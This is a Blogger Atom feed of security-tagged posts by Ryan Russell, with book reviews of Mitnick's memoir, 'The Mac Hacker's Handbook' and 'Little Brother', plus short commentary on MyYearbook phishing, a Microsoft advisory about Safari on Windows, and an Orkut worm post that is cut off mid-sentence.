<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:blogger='http://schemas.google.com/blogger/2008' xmlns:georss='http://www.georss.org/georss' xmlns:gd="http://schemas.google.com/g/2005" xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-18579416</id><updated>2025-09-23T14:21:17.487-07:00</updated><category term="secphil"/><category term="egoblogging"/><category term="stories"/><category term="security"/><category term="OS X sucks"/><category term="RE"/><category term="work"/><category term="books"/><category term="spare brain"/><category term="malware"/><category term="pneumopunk"/><category term="v12n"/><category term="IT"/><category term="cloudbaiting"/><category term="locks"/><category term="review"/><title type='text'>ryanlrussell</title><subtitle type='html'></subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://ryanlrussell.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/-/security'/><link rel='alternate' type='text/html' href='http://ryanlrussell.blogspot.com/search/label/security'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>Ryan Russell</name><uri>http://www.blogger.com/profile/13265663681454609204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_ZPESRkoUdM8/SgjqmzPwjqI/AAAAAAAAABU/pkaoc0PCYOs/S220/Photo+2.jpg'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>9</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-18579416.post-2737781782406683321</id><published>2011-10-07T20:47:00.000-07:00</published><updated>2011-10-07T21:21:30.320-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="books"/><category scheme="http://www.blogger.com/atom/ns#" term="security"/><title type='text'>Ghost in the Wires</title><content type='html'>Ghost in the Wires, Mitnick &amp;amp; Simon&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;iframe src=&quot;http://rcm.amazon.com/e/cm?t=thievco&amp;amp;o=1&amp;amp;p=8&amp;amp;l=as1&amp;amp;asins=0316037702&amp;amp;ref=tf_til&amp;amp;fc1=000000&amp;amp;IS2=1&amp;amp;lt1=_blank&amp;amp;m=amazon&amp;amp;lc1=0000FF&amp;amp;bc1=000000&amp;amp;bg1=FFFFFF&amp;amp;f=ifr&quot; style=&quot;width:120px;height:240px;&quot; marginwidth=&quot;0&quot; marginheight=&quot;0&quot; frameborder=&quot;0&quot; scrolling=&quot;no&quot;&gt;&lt;/iframe&gt;&lt;br /&gt;&lt;p&gt;Disclaimer: Kevin Mitnick is a personal friend, and this review is based on a late galley copy. I have no financial interest in this book. The above link is an affiliate link.&lt;/p&gt;&lt;p&gt;I have been reading books about Kevin Mitnick for years. Finally, we get to read the best one yet. All of the previous authors worked from information they could glean, and some limited interactions with Kevin himself. The problem is, he was playing most of them a lot of the time. What we have here is Kevin&#39;s own version of his story, written himself, along with his collaborator William Simon.&lt;/p&gt;&lt;p&gt;I&#39;ll just jump right in; I loved this book. If you have any interest in real-world hacks at all, read it. The other books and news stories didn&#39;t cover half of what he did. As I devoured in in two days, I kept turning to people to say &quot;Read this!&quot; or repeating one of his stories for co-workers.&lt;/p&gt;&lt;p&gt;I have some clear favorite stories, but I don&#39;t want to give any spoilers. It&#39;s that much like reading a thriller. My favorites are how he defeated the radio encryption used by the FBI, and how he would go about obtaining a new identity. Specifically, how and where he researched the identities, and got the appropriate document papers.&lt;/p&gt;&lt;p&gt;The sheer audacity that some of his tricks took is amazing to me. He admits things in the first few pages that surprised me. And after reading about how things went with his friends over the years, I finally have some appreciation for why he has such hatred of snitches.&lt;/p&gt;&lt;p&gt;Let&#39;s be clear, this is not a technical book like others I have read. He doesn&#39;t cover how to exploit a stack overflow. When he breaks into a Solaris box, he says &quot;I used a Solaris exploit.&quot; He says that the reason for that was to make it more readable for the general public. And I don&#39;t think he&#39;s incorrect in that. The focus is story and history.&lt;/p&gt;&lt;p&gt;But even if you&#39;re a hard-core technical security person, I think you&#39;ll like the book for what it is. Unless you think that security begins and ends with writing a cool exploit. Do I think Kevin has technical skills? I do. But those aren&#39;t his greatest powers. Yes, he&#39;s a fantastic social engineer. And using those skills, he owned more things and companies than probably anyone else. A 0-day exploit that lets you break into a source control server is impressive. But I don&#39;t think it&#39;s quite as cool as calling up and getting them to just mail you a tape with the source. There&#39;s no patch for stupid.&lt;/p&gt;&lt;p&gt;You&#39;ll also enjoy the book if you have an interest in computer or security history like I do. It spans several decades, from when he was a kid interested in magic up to almost present day. There are the cameos from other well-known hackers that have had books written about them as well. I have enjoyed reading articles and seeing Twitter exchanges with Kevin and some of his old victims. (All amiable so far as I have seen.)&lt;/p&gt;&lt;p&gt;If you want the most accurate version of the Mitnick story available, here you go.&lt;br /&gt;&lt;/p&gt;</content><link rel='replies' type='application/atom+xml' href='http://ryanlrussell.blogspot.com/feeds/2737781782406683321/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment/fullpage/post/18579416/2737781782406683321' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/2737781782406683321'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/2737781782406683321'/><link rel='alternate' type='text/html' href='http://ryanlrussell.blogspot.com/2011/10/ghost-in-wires.html' title='Ghost in the Wires'/><author><name>Anonymous</name><uri>http://www.blogger.com/profile/01938554978113604206</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-18579416.post-7936927584887217546</id><published>2009-05-11T20:22:00.000-07:00</published><updated>2009-05-11T21:13:48.960-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="books"/><category scheme="http://www.blogger.com/atom/ns#" term="malware"/><category scheme="http://www.blogger.com/atom/ns#" term="OS X sucks"/><category scheme="http://www.blogger.com/atom/ns#" term="RE"/><category scheme="http://www.blogger.com/atom/ns#" term="security"/><title type='text'>The Mac Hacker&#39;s Handbook</title><content type='html'>&lt;div style=&quot;text-align: left;&quot;&gt;&lt;iframe src=&quot;http://rcm.amazon.com/e/cm?t=thievco&amp;amp;o=1&amp;amp;p=8&amp;amp;l=as1&amp;amp;asins=0470395362&amp;amp;fc1=000000&amp;amp;IS2=1&amp;amp;lt1=_blank&amp;amp;m=amazon&amp;amp;lc1=0000FF&amp;amp;bc1=000000&amp;amp;bg1=FFFFFF&amp;amp;f=ifr&quot; style=&quot;width: 120px; height: 240px;&quot; marginwidth=&quot;0&quot; marginheight=&quot;0&quot; frameborder=&quot;0&quot; scrolling=&quot;no&quot;&gt;&lt;/iframe&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;The Mac Hacker&#39;s Handbook is the best reference for Mac-specific attack information that I have found. At 368 pages, it may appear small compared to the typical 750+ page security tome. That&#39;s because the authors have done a near-perfect job of sticking to the topic at hand, the Mac. The authors do not succumb to the usual temptation to try and teach assembly language or reverse engineering. Rather, they do an excellent job touching on those topics in an OS X context, and assume the reader has a little background in that area already, or can otherwise keep up. I have done some limited research into the areas of Mac malware and process injection in the past. This book has done a fantastic job of filling in many holes in my knowledge that I hadn&#39;t been able to take care of before. Plus, it introduced me to a number of Mac-specific security features I wasn&#39;t aware of before. Highly recommended for anyone interested in Mac security.&lt;br /&gt;&lt;br /&gt;Detailed commentary follows.&lt;br /&gt;&lt;br /&gt;The authors Charlie Miller and Dino Dai Zovi have impressed me on several levels.&lt;br /&gt;&lt;br /&gt;A couple of years ago, I did a presentation of Mac malware, where I researched some similar areas on my own. The purpose of my talk was to demonstrate that the privilege separation on a typical single-user OS X box made no difference, because an attacker could do everything they need from user mode.&lt;br /&gt;&lt;br /&gt;My skills are somewhere between beginner and intermediate in the areas of programming, reverse engineering, vulnerability research and exploit writing. With a lot of work, I was able to create a very crude keyboard sniffer by attaching a library to launched processes. In one chapter (chapter 11), this book spelled out everything I needed to know and more. And implements several useful injected components in a much more flexible way than I was able to. I could have really used this information then.&lt;br /&gt;&lt;br /&gt;I ran across many of the same libraries and examples that the authors reference in the book. However, they were mostly code examples with no context, intended to be groked by hard-core Mac programmers. Here, they are presented in an actual understandable way, building on examples as they go. It makes a huge difference. The level of writing meshed perfectly with my past knowledge and filled in the holes I had. I have an advantage over a rank beginner, but I suspect they have reached as wide an audience as is possible with their writing.&lt;br /&gt;&lt;br /&gt;They do this consistently throughout the book. And this is what really made this an excellent book for me, was the actual writing. You&#39;ll have to excuse me if I geek out a little bit on this topic, but I&#39;ve written a few technical books myself, and I have a great appreciation for how hard it is to do this well.&lt;br /&gt;&lt;br /&gt;There are many traps one can fall into when writing a book like this. A lot of the topics are circular. As in, it&#39;s difficult to pick a sane order to follow, and not repeat a lot of information. There&#39;s always a temptation to try and show off advanced topics, and not adequately cover the intro material. It&#39;s easy to get lazy and not put the time into explaining a concept, assuming everyone knows it. Authors sometimes dump a lot of pictures and code on the reader for length.&lt;br /&gt;&lt;br /&gt;These authors fell for none of these. The ordering of topics and advancing difficulty seem ideal. Code is almost uniformly useful and well-documented. They don&#39;t beat you over the head with example after example for the same topic. Rather than attempting to include a complete PowerPC and x86 instruction reference, they give you the minimum set of instructions that they used. The pacing was great. I was neither bored reading things I knew, nor unable to keep up with the material (until I struggled slightly to absorb the last chapter or two.)&lt;br /&gt;&lt;br /&gt;Production values are good. The price is great, the length is very appropriate. Editing is good. (Not perfect; I spotted a dozen very minor typos. But then, I can&#39;t turn off my internal proofreader anymore, you&#39;re unlikely to notice most if any of those.)&lt;br /&gt;&lt;br /&gt;There are other minor things to appreciate if you&#39;ve been around vulnerabilities and exploits for a while. I feel like they did a great job explaining heap exploitation, compared to other attempts I&#39;ve read. I very much enjoyed the little bits of history when they discuss who pioneered a particular technique. Most of Dino&#39;s code has a date in the comments, so you have some idea what was known at the time.&lt;br /&gt;&lt;br /&gt;I&#39;d go so far as to say that this book really is a general book about how to find and exploit vulnerabilities, using the Mac as your research platform. And it turns out that the Mac is a great place to learn.</content><link rel='replies' type='application/atom+xml' href='http://ryanlrussell.blogspot.com/feeds/7936927584887217546/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment/fullpage/post/18579416/7936927584887217546' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/7936927584887217546'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/7936927584887217546'/><link rel='alternate' type='text/html' href='http://ryanlrussell.blogspot.com/2009/05/mac-hackers-handbook.html' title='The Mac Hacker&#39;s Handbook'/><author><name>Ryan Russell</name><uri>http://www.blogger.com/profile/13265663681454609204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_ZPESRkoUdM8/SgjqmzPwjqI/AAAAAAAAABU/pkaoc0PCYOs/S220/Photo+2.jpg'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-18579416.post-4604125511726947987</id><published>2008-07-21T12:08:00.000-07:00</published><updated>2008-07-21T12:21:14.043-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="egoblogging"/><category scheme="http://www.blogger.com/atom/ns#" term="security"/><title type='text'>MyYearbook</title><content type='html'>I&#39;ve been wasting a bunch of time on MyYearbook.com, a MTWWTOSNS (massively time-wasting web-two-oh social-networking site.) If you&#39;d like to descend into madness with me, click here join join for my personal gain:&lt;br /&gt;&lt;a href=&quot;http://www.myyearbook.com/join.php?ref=1211864511&quot;&gt;Be Ryan&#39;s Friend&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Several interesting aspects to this one, for security people. First, the are many sociological aspects. For example, what happens if you tell people they &lt;span style=&quot;font-style: italic; font-weight: bold;&quot;&gt;can&#39;t&lt;/span&gt; post naked pics? Second, there is a play money currency, which drives everyone&#39;s behavior. Finally, they are getting phished left and right from &lt;span style=&quot;font-style: italic; font-weight: bold;&quot;&gt;within&lt;/span&gt; the site.&lt;br /&gt;&lt;br /&gt;And the staff there appears to be so woefully unprepared to deal with it. When I saw the phishing, I thought I might mail their abuse contact info (only email address I found published), and see if they needed info, if I could put them in touch with a takedown group, etc. I got bounces from gmail. Um, your abuse email at your own domain depends on gmail?&lt;br /&gt;&lt;br /&gt;The site is absolutely begging for someone to start using XSS. The game model they have basically demands it. For example, your popularity depends on profile views. And I can post a pretty wide range of HTML to someone in about 20 different ways. I haven&#39;t tried to see if I can find any XSS. Mostly because I don&#39;t trust myself not to abuse it.&lt;br /&gt;&lt;br /&gt;But my favorite thing about MyYearbook that I just realized, while sitting in JFK coming back from HOPE. This site is teaching millions of people how to do simple HTML. And nearly half of these people are below average intelligence.&lt;br /&gt;&lt;br /&gt;Edutainment, indeed.</content><link rel='replies' type='application/atom+xml' href='http://ryanlrussell.blogspot.com/feeds/4604125511726947987/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment/fullpage/post/18579416/4604125511726947987' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/4604125511726947987'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/4604125511726947987'/><link rel='alternate' type='text/html' href='http://ryanlrussell.blogspot.com/2008/07/myyearbook.html' title='MyYearbook'/><author><name>Ryan Russell</name><uri>http://www.blogger.com/profile/13265663681454609204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_ZPESRkoUdM8/SgjqmzPwjqI/AAAAAAAAABU/pkaoc0PCYOs/S220/Photo+2.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-18579416.post-1789673318552241975</id><published>2008-06-08T14:26:00.000-07:00</published><updated>2008-06-08T15:59:48.511-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="review"/><category scheme="http://www.blogger.com/atom/ns#" term="secphil"/><category scheme="http://www.blogger.com/atom/ns#" term="security"/><title type='text'>Little Brother</title><content type='html'>I just finished reading &lt;a href=&quot;http://www.amazon.com/gp/redirect.html?ie=UTF8&amp;amp;location=http%3A%2F%2Fwww.amazon.com%2FLittle-Brother-Cory-Doctorow%2Fdp%2F0765319853&amp;amp;tag=thievco&amp;amp;linkCode=ur2&amp;amp;camp=1789&amp;amp;creative=9325&quot;&gt;Little Brother&lt;/a&gt;&lt;img src=&quot;http://www.assoc-amazon.com/e/ir?t=thievco&amp;amp;l=ur2&amp;amp;o=1&quot; alt=&quot;&quot; style=&quot;border: medium none  ! important; margin: 0px ! important;&quot; border=&quot;0&quot; height=&quot;1&quot; width=&quot;1&quot; /&gt; by Cory Doctorow while on a plane to Seattle for a &lt;a href=&quot;http://windowssecrets.com/&quot;&gt;Windows Secrets&lt;/a&gt; meetup.&lt;br /&gt;&lt;br /&gt;There are a few audiences one might rate this book against. Probably the only fair one is the one Cory wrote for, young adult readers who need an introduction to electronic civil rights (and civil rights in general, for that matter.) For that audience, I think he has succeeded admirably. I will make my copy available to my kids, and see if any of them have an opinion.&lt;br /&gt;&lt;br /&gt;To be sure, the book tries to indoctrinate readers to the cyber libertarian way of thinking. Since I happen to agree with that doctrine, I have no problem with that. (And yes, I gave up fighting the use of &quot;cyber&quot;. I lose.)&lt;br /&gt;&lt;br /&gt;Another audience I might rate this book against is the one I put myself in. Middle-aged infosec people. Perhaps with a little amateur writer thrown in. I still recommend the book, but now I have to start breaking out caveats and picking nits.&lt;br /&gt;&lt;br /&gt;Spoilers ahoy.&lt;br /&gt;&lt;br /&gt;First off, how&#39;s the tech? This is a sliding graph. Compared to the vast majority of the books in the world, Cory&#39;s technical accuracy is quite high. There are extreme ends of this scale. For example, Dan Brown (The Da Vinci Code author) writes with basically zero tech accuracy. Amazingly good, page-turning drama. Horrible tech. So Dan&#39;s down at the great writing, lousy tech corner.&lt;br /&gt;&lt;br /&gt;If I may give my ego a backhanded stroke for a moment, I place myself up at the opposite corner. In the &lt;a href=&quot;http://www.amazon.com/gp/redirect.html?ie=UTF8&amp;amp;location=http%3A%2F%2Fwww.amazon.com%2Fs%3Furl%3Dsearch-alias%253Daps%26field-keywords%3Dstealing%2Bthe%2Bnetwork%26x%3D0%26y%3D0&amp;amp;tag=thievco&amp;amp;linkCode=ur2&amp;amp;camp=1789&amp;amp;creative=9325&quot;&gt;Stealing the Network&lt;/a&gt;&lt;img src=&quot;http://www.assoc-amazon.com/e/ir?t=thievco&amp;amp;l=ur2&amp;amp;o=1&quot; alt=&quot;&quot; style=&quot;border: medium none  ! important; margin: 0px ! important;&quot; border=&quot;0&quot; height=&quot;1&quot; width=&quot;1&quot; /&gt;  series, I went way out of my way to make my tech 100% accurate. I also acknowledge that my writing probably sucks, so I like to think of myself as the anti-Dan Brown. Mercifully, my books are shelved in the Computer section of book stores.&lt;br /&gt;&lt;br /&gt;Cory&#39;s writing in Little Brother is good and his tech is very good. (For a not-specifically tech, non-hacking book). So he&#39;s in the upper-right quadrant of the graph.&lt;br /&gt;&lt;br /&gt;But of course I&#39;m compelled to point out specific problems. Cory sacrifices some accuracy for plot in a few key places. And appropriately so, I think. The plot flows better this way. Biggest example is the RFID rewriting. The majority of the tags are not rewritable. Cory has kids running around doing non-contact rewrites of FastTrak and other cheap RFID tags. Doesn&#39;t work in real life. Nor, I believe, in the near future.&lt;br /&gt;&lt;br /&gt;Speaking of time, I can&#39;t recall spotting anything in the book that would indicate a specific year. I&#39;m sure that&#39;s intentional. I&#39;ve had my books described as being 10 minutes into the future. I think Cory&#39;s at 60 minutes. It reads like now plus 5 to 10 years.&lt;br /&gt;&lt;br /&gt;Cory&#39;s writing also snags in a few places. (Keep in mind, just because I can spot someone else doing it doesn&#39;t mean I can avoid doing it myself.) One of his purposes is to instruct. He doesn&#39;t assume the reader knows what an RFID tag is in the first place. This is where there&#39;s a big difference between random YA reader and someone like me who has been doing security for years.&lt;br /&gt;&lt;br /&gt;For me, he&#39;s way over-explaining, and the story grids to a halt. It&#39;s mostly first-person, and so are the explanations. But the first person goes from being aimed at someone in the story to being aimed at the reader. It&#39;s as if the main character turns to look straight out of the page at you. For someone who knows these things, it&#39;s like saying &quot;money can be used for goods and services.&quot; So this lessened the enjoyment of the story aspect for me somewhat. But again, probably a tradeoff he made.&lt;br /&gt;&lt;br /&gt;I also am already caught up on all the technical and political aspects the book covers, so I didn&#39;t learn anything new there. But then I read Boing Boing, was around when the EFF was founded, have been going to various hacking conferences for over a decade, and know half of the people Cory used for source material.&lt;br /&gt;&lt;br /&gt;In my case, that leaves the story. On to the parts I did like. I find the overall plot, sadly, believable. It&#39;s almost entirely set in San Francisco and the Bay Area, where I live. So he gets local color points. He came up with a number of characters I care about. He made me angry about what was happening in the story. After the first couple of chapters, I had to spend all my spare time reading it.&lt;br /&gt;&lt;br /&gt;Let me see if I can help you categorize yourself as a person who would agree with the politics of this book, and would be ok sharing with a YA reader. Do you get mad every time &lt;a href=&quot;http://thomashawk.com/&quot;&gt;Thomas Hawk&lt;/a&gt; links to a story about a photographer getting hassled by the police or a security guard? Do you want to call up and scream at a school board or principal when &lt;a href=&quot;http://www.fark.com/&quot;&gt;Fark&lt;/a&gt; links to a story about some kid getting expelled for a t-shirt or haircut? Do you have nothing but contempt for the &lt;a href=&quot;http://www.emergentchaos.com/archives/2008/06/praises_for_the_tsa.html&quot;&gt;TSA&lt;/a&gt; every time you find yourself removing your shoes at the airport?&lt;br /&gt;&lt;br /&gt;If the answer is yes, then you will probably &quot;enjoy&quot; the plot and be right on board with the political implication. Be prepared to spend the first half of the book angry.&lt;br /&gt;&lt;br /&gt;You know what else I liked? Cory didn&#39;t shy away from the other points of view in the discussion. He goes ahaead and points out how his main character is just like a terrorist. He gets screwed over by his parents for most of the book. Some of his own friends give up on him. Some of his trusted circle betray him. He doubts constantly. He suffers for it. It&#39;s not like Cory&#39;s position still isn&#39;t clear, but I appreciate him exposing all the costs.&lt;br /&gt;&lt;br /&gt;The big moral of the story is that intrusive government sucks. But the smaller moral is that you have to stand up for your own rights, and it&#39;s going to hurt.&lt;br /&gt;&lt;br /&gt;&lt;a href=&quot;http://craphound.com/littlebrother/download/&quot;&gt;Little Brother download page&lt;/a&gt;&lt;a href=&quot;http://www.google.com/search?hl=en&amp;amp;safe=off&amp;amp;domains=boingboing.net&amp;amp;sitesearch=boingboing.net&amp;amp;q=%22little+brother%22&amp;amp;btnG=Search&amp;amp;sitesearch=boingboing.net&quot;&gt;&lt;br /&gt;Little Brother posts&lt;/a&gt; on Boing Boing&lt;a href=&quot;http://www.boingboing.net/2004/08/22/stealing-the-network.html&quot;&gt;&lt;br /&gt;Cory&#39;s review of one of my books&lt;/a&gt; (seems only fair)</content><link rel='replies' type='application/atom+xml' href='http://ryanlrussell.blogspot.com/feeds/1789673318552241975/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment/fullpage/post/18579416/1789673318552241975' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/1789673318552241975'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/1789673318552241975'/><link rel='alternate' type='text/html' href='http://ryanlrussell.blogspot.com/2008/06/little-brother.html' title='Little Brother'/><author><name>Ryan Russell</name><uri>http://www.blogger.com/profile/13265663681454609204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_ZPESRkoUdM8/SgjqmzPwjqI/AAAAAAAAABU/pkaoc0PCYOs/S220/Photo+2.jpg'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-18579416.post-1217319636542281002</id><published>2008-05-31T10:27:00.000-07:00</published><updated>2008-05-31T10:28:46.768-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="secphil"/><category scheme="http://www.blogger.com/atom/ns#" term="security"/><title type='text'>Race to Zero</title><content type='html'>The &lt;a href=&quot;http://www.racetozero.net/&quot;&gt;Race to Zero&lt;/a&gt; contest.&lt;br /&gt;&lt;br /&gt;So, people are going to write some new packers? OK, no problem then.</content><link rel='replies' type='application/atom+xml' href='http://ryanlrussell.blogspot.com/feeds/1217319636542281002/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment/fullpage/post/18579416/1217319636542281002' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/1217319636542281002'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/1217319636542281002'/><link rel='alternate' type='text/html' href='http://ryanlrussell.blogspot.com/2008/05/race-to-zero.html' title='Race to Zero'/><author><name>Ryan Russell</name><uri>http://www.blogger.com/profile/13265663681454609204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_ZPESRkoUdM8/SgjqmzPwjqI/AAAAAAAAABU/pkaoc0PCYOs/S220/Photo+2.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-18579416.post-4884582559146387615</id><published>2008-05-30T21:43:00.000-07:00</published><updated>2008-05-31T11:07:07.193-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="security"/><title type='text'>Is Microsoft dropping Apple 0-day?</title><content type='html'>Just saw this link show up in my RSS reader:&lt;a href=&quot;http://www.microsoft.com/technet/security/advisory/953818.mspx&quot;&gt;&lt;br /&gt;&lt;/a&gt;&lt;a href=&quot;http://www.microsoft.com/technet/security/advisory/953818.mspx&quot;&gt;Microsoft Security Advisory (953818) Blended Threat from Combined Attack Using Apple’s Safari on the Windows Platform&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;From the advisory:&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;FAQ&lt;br /&gt;&lt;br /&gt;&lt;b&gt;What causes this threat?&lt;/b&gt;&lt;br /&gt;A combination of the default download location in Safari and how the Windows desktop handles executables creates a blended threat in which files may be downloaded to a user’s machine without prompting, allowing them to be executed. Safari is available as a stand-alone install or through the Apple Software Update application.&lt;br /&gt;&lt;/blockquote&gt;&lt;br /&gt;And&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;Workarounds&lt;p&gt;Microsoft has tested the following workarounds. Although these workarounds will not correct the underlying vulnerability, they help block known attack vectors. When a workaround reduces functionality, it is identified in the following section.&lt;/p&gt;&lt;table border=&quot;0&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot;&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class=&quot;listBullet&quot; valign=&quot;top&quot;&gt;•&lt;/td&gt;&lt;td class=&quot;listItem&quot;&gt;&lt;p&gt;Change the download location of content in Safari to a location other than ‘Desktop’&lt;/p&gt;&lt;p&gt;Launch Safari. Under the &lt;b&gt;Edit&lt;/b&gt; menu select &lt;b&gt;Preferences&lt;/b&gt;. &lt;/p&gt;&lt;p&gt;At the option where it states &lt;b&gt;Save Downloaded Files to:&lt;/b&gt;, select a different location on the local drive. &lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/blockquote&gt;So... that sounds a lot like if I were to download a desktop.ini file or something like that, I&#39;d get my Windows all 0wned. As in, if I cared to, I probably wouldn&#39;t have to work too hard to figure out how to exploit this from Microsoft&#39;s description and workaround.&lt;br /&gt;&lt;br /&gt;Is this being exploited in the wild or something? Otherwise I kinda would have expected Microsoft to keep quiet until it was patched by Apple.&lt;br /&gt;&lt;br /&gt;I guess Apple &lt;a href=&quot;http://www.betanews.com/article/Apple_pushing_iTunes_QT_users_on_Windows_to_download_Safari/1206113171&quot;&gt;pushing Safari on Windows iTunes/Quicktime users&lt;/a&gt; isn&#39;t looking so hot about now?&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-weight: bold;&quot;&gt;Update:&lt;/span&gt;&lt;br /&gt;Aha, pointer from &lt;a href=&quot;http://apple.slashdot.org/article.pl?sid=08/05/31/1214254&quot;&gt;Slashdot&lt;/a&gt; and &lt;a href=&quot;http://www.theregister.co.uk/2008/05/31/microsoft_warns_against_apple_safari/&quot;&gt;The Register&lt;/a&gt;. The &lt;a href=&quot;http://www.dhanjani.com/archives/2008/05/safari_carpet_bomb.html&quot;&gt;carpet bombing&lt;/a&gt; seems to be the genesis, but that&#39;s not the whole story, since he doesn&#39;t talk about executing code.&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-weight: bold;&quot;&gt;Update2:&lt;/span&gt;&lt;br /&gt;&lt;a href=&quot;http://aviv.raffon.net/2008/05/31/SafariPwnsInternetExplorer.aspx&quot;&gt;There it is&lt;/a&gt;, it was found by Aviv Raff.</content><link rel='replies' type='application/atom+xml' href='http://ryanlrussell.blogspot.com/feeds/4884582559146387615/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment/fullpage/post/18579416/4884582559146387615' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/4884582559146387615'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/4884582559146387615'/><link rel='alternate' type='text/html' href='http://ryanlrussell.blogspot.com/2008/05/is-microsoft-dropping-apple-0-day.html' title='Is Microsoft dropping Apple 0-day?'/><author><name>Ryan Russell</name><uri>http://www.blogger.com/profile/13265663681454609204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_ZPESRkoUdM8/SgjqmzPwjqI/AAAAAAAAABU/pkaoc0PCYOs/S220/Photo+2.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-18579416.post-2381549055715809294</id><published>2007-12-19T00:22:00.000-08:00</published><updated>2007-12-19T01:09:55.107-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="malware"/><category scheme="http://www.blogger.com/atom/ns#" term="security"/><title type='text'>More on Orkut worm</title><content type='html'>Yes, my HTML/Javascript-fu is weak. So much so that I didn&#39;t know we were dealing with pure Javascript. Javascript that just happens to exist to facilitate posting Flash movies and games, so that&#39;s why it has &quot;Flash&quot; written all over it.&lt;br /&gt;&lt;br /&gt;To back up several steps... I received an email from Orkut saying that someone I know had left me a scrapbook entry. I went and looked at it, and was puzzling over the non-Englishness of it from someone whom I know is an English speaker. Of course during that time my browser (Firefox on OS X) was busy doing the same to my Orkut contacts. Sorry about that guys!&lt;br /&gt;&lt;br /&gt;One of them is Jeremy Rauch. Within minutes of me looking at my scrapbook, I get email that Jeremy and others have now left me new scrapbook entries. This is about when I start to guess what&#39;s going on. I mail Jeremy to point out that he seems to have it now, and he says he knows... I gave it to him. Whoops! Jeremy was skeptical that Flash was really involved, since he has it blocked in his browser by default. He was right.&lt;br /&gt;&lt;br /&gt;So here is what I think is happening, to the best of my ability as someone with weak Javascript-fu. Take a look at the chunk of HTML that ends up as a scrapbook entry that I &lt;a href=&quot;http://ryanlrussell.blogspot.com/2007/12/orkut-virus.html&quot;&gt;posted earlier&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;It obviously pulls in a chunk of Javascript that is even named &quot;virus.js&quot;. But why all the trickery with the Shockwave and flash stuff? If 